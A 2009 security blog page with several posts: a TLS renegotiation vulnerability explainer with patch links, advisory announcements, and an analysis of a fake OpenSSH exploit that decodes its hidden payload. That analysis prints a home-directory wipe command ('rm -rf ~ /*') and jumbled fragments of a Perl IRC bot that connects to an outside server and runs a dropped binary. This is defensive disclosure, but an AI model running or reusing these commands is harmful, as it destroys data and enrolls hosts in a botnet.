TLS / SSLv3 renegotiation vulnerability explained - NEW update

Subscribe to the RSS feed in case you are interested in updates

I updated the whitepaper "TLS / SSLv3 vulnerability explained" :

Updated 18.11.2009 : Added SMTP over TLS attack scenario, added s_client testcase
Updated 30.11.2009 : Added FTPS analysis, new attacks against HTTPS (injecting responses and downgrading to HTTP)  

Download : http://clicky.me/tlsvuln

New SSLv3 / TLS vulnerability - MITM attacks possible

Subscribe to the RSS feed in case you are interested in updates

In order to allow me to update in a more convenient manner, the latest updates will be added to the G-SEC blog only. Once the final revision of this blog post will be achieved I will update this blog with the latest one.

---

• Updated 17:50 GMT+1 / 05.2009 - added Mitigation / Impact 
• Updated 16:40 GMT+1 / 06.2009 - added IETF draft 
• Updated 14:35 GMT+1 / 07.2009 - added SSLTLS Test Tool 
• Updated 16:34 GMT+1 / 07.2009 - added OpenSSL patch 
• Updated 13:00 GMT+1 / 09.2009 - added GNUTLS patch 
• Updated 19:40 GMT+1 / 09.2009 - added Mikestoolbox.net testing TLS renegotiation support 
• Updated 21:29 GMT+1 / 09.2009 - added Apache patch, Mozilla Bug ID, Redhat Bug ID, Mozilla patch disabling tls renegotiation, Tomcat mitigation 
• Updated 21:00 GMT+1 / 12.2009 - added a whitepaper trying to explain the vulnerability and it's implications to a broader audience

After some in-house tests, we can confirm that the vulnerability presented at http://www.extendedsubset.com/ indeed real and should pose a significant threat to most. The vulnerability has been discovered by "Marsh Ray".

We are currently looking into possible mitigations and will update this blog post regularly with more information regarding said vulnerability - if available.

Details

• G-SEC Whitepaper (DRAFT) about the renegotiation vulnerability
  
• Protocol and attack flow graph (Author: Marsh Ray)
  
• White paper about the attack (Author: Marsh Ray)
• Network data captures (Author: Marsh Ray)
• Explanation by Ivan Ristic
• IETF Draft
• SSLTLS Test tool (Leviathan Security)
• Mikestoolbox.net - Test client implementation for TLS renegotiation extension

Patches

• OpenSSL 0.9.81 ( Attention: OpenSSL removed the TLS/SSL renegotiation feature from this package - you need to test application before/after updating to this version ) (via ISC)
• GnuTLS patch (implements a new TLS extension proposed in the IETF Draft) (via SID)
• Apache patch (patches renogtiation prefix attacks at the application layer, still need openssl fixes for other attacks)

Impacts :

Currently known to exist

• In general an attacker positioned in the middle of a connection may inject arbritary content into the beginning of an authenticated strea, it will be interesting to see what potential impact this vulnerability has within each of the applications / protocols supporting it. IMAPS, FTPSSL, POP3 etc
• For web servers - Attackers (if in the middle) can inject data into a segment that is authenticated to the web server, the web server will merge those requests and process them. (GET requests are trivially exploitable, POST are not known to be)
  

Mitigations :

• Monitor renegotiation requests
• To mitigate possible attacks against web applications - use an IPS/IDS/Application firewall to catch recurrent HTTP request that are enclosed within each other

Computer Associates multiple products - RCE

Subscribe to the RSS feed in case you are interested in updates

I released another advisory today, the affected products are from Computer Associates who I'd like to thank for the cooperation and feedback.

I published the advisory @G-SEC

Derren Brown guessed the lottery numbers - afterwards

Subscribe to the RSS feed in case you are interested in updates

Derren Brown, the NLP master and magician  "predicted" the Lotterie numbers Live on TV and promised to tell on Friday how he did it - well he didn't really. The explanations on Friday is obviously not very convincing. He claimed to have used the phenomenon called "Crowd wisdom" whereas a group of poeple, taking the average often guess correctly. Right.

Daren Brown predicting the Lottery




The "ball" that gave it away
<


Simulation of the trick



Real NLP trickery

• Sublimal advertising
• Paying with plain paper
• BMX
• More Derren Brown

You get what you pay for

Subscribe to the RSS feed in case you are interested in updates

On a more non-technical note, I stumbled across this offer from a "renowed luxemburgish recruitment agency." I am not sure what part of this job opening is the worst, that they actually publish such a bad written job opening or that the candidates will be judged by the person that wrote this opening. Apparently they are being paid to do so.

Disclaimer: The text has been shortened but not edited.

Did you get the "our aim is to keep the highest standards in terms of quality" - They sure succeeded with this job posting.

Original: http://www.iitjobs.com/candidates/ShowJobDetails.aspx?jid=137014

IIS 5&6 FTP vulnerability - information and tools (KB975191)

Subscribe to the RSS feed in case you are interested in updates

I wrote a small summary and facts about the recent IIS5&6 FTP 0day, note that te vulnerable part of the code can be reached without writing to a directory on IIS6 but that Stackcookies make exploitation impossible/unlikely.

More information :
http://blog.g-sec.lu/2009/09/iis-5-iis-6-ftp-vulnerability.html

New advances in Office malware analysis

Subscribe to the RSS feed in case you are interested in updates

http://blog.g-sec.lu/2009/07/new-advances-in-officeexcelpowerpoint.html

Dear Anti virus vendors,
Your clients are getting compromised this very minute, instead of spending your time to please gamers (??) how about you spend 0,001% of your budget to implement generic methods of detection, especially for gateways.

Advisory : One bug to rule them all - Firefox, IE, Safari,Opera, Chrome,Seamonkey,iPhone,iPod,Wii,PS3....

Subscribe to the RSS feed in case you are interested in updates

• [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari,Opera, Chrome,Seamonkey,iPhone,iPod,Wii,PS3....
  

0pen0wn.c - Shellcode "dissasembled"

Subscribe to the RSS feed in case you are interested in updates

Rumor had it that the anti-sec group was using a OpenSSH 0day, str0ke today linked to an URL that supposedly has the exploit code to that 0day.

The reason the disassembled shellcode looked like crap is that, well , it isn't shellcode, it is nothing else then plain ascii bash/php commands.

Here is that JMP code converted to "assembly" :

00000000 jb 0x6f
00000002 and byte[0x7e206672],ch
00000008 and byte[edi],ch
0000000a sub ah,byte[eax]
0000000c xor bh,byte[esi]
0000000e and byte[edi],ch
00000010 fs: gs: jbe 0x43
00000014 outs dx,byte[esi]
00000015 jne 0x83
00000017 ins byte[es:edi],dx
00000018 and byte[esi],ah

Obviously, this code doesn't make any sense whatsoever, so and here is the JMP code converted from HEX to ASCII :

rm -rf ~ /* 2> /dev/null &

The "shellcode" part actually is :

#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
sleep 1;
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}sleep 1;
sleep 1;
";
while (<$sockn";
sleep 1;
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl

The supposedly freebsd shellcode is:

";
while (<$sockn";
="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}";
while (<$sock";
while (<$sockn";
sleep 1;
n";
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="sleep 1;
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="irc.ham.de.euirc.net";$SIG{TERM}d +x /tmp/hi 2>/dev/null;/tmp/hi";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print ";
while (<$sockn";
sleep 1;
k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi

Advisories - FPROT,Clamav

Subscribe to the RSS feed in case you are interested in updates

• [TZO-33-2009] FPROT generic bypass (TAR)
• [TZO-40-2009] Clamav generic bypass (RAR,ZIP,CAB)
• [TZO-34-2009] FPROT generic bypass (RAR,LHA,ARJ)
• [TZO-43-2009] Clamav generic bypass (CAB)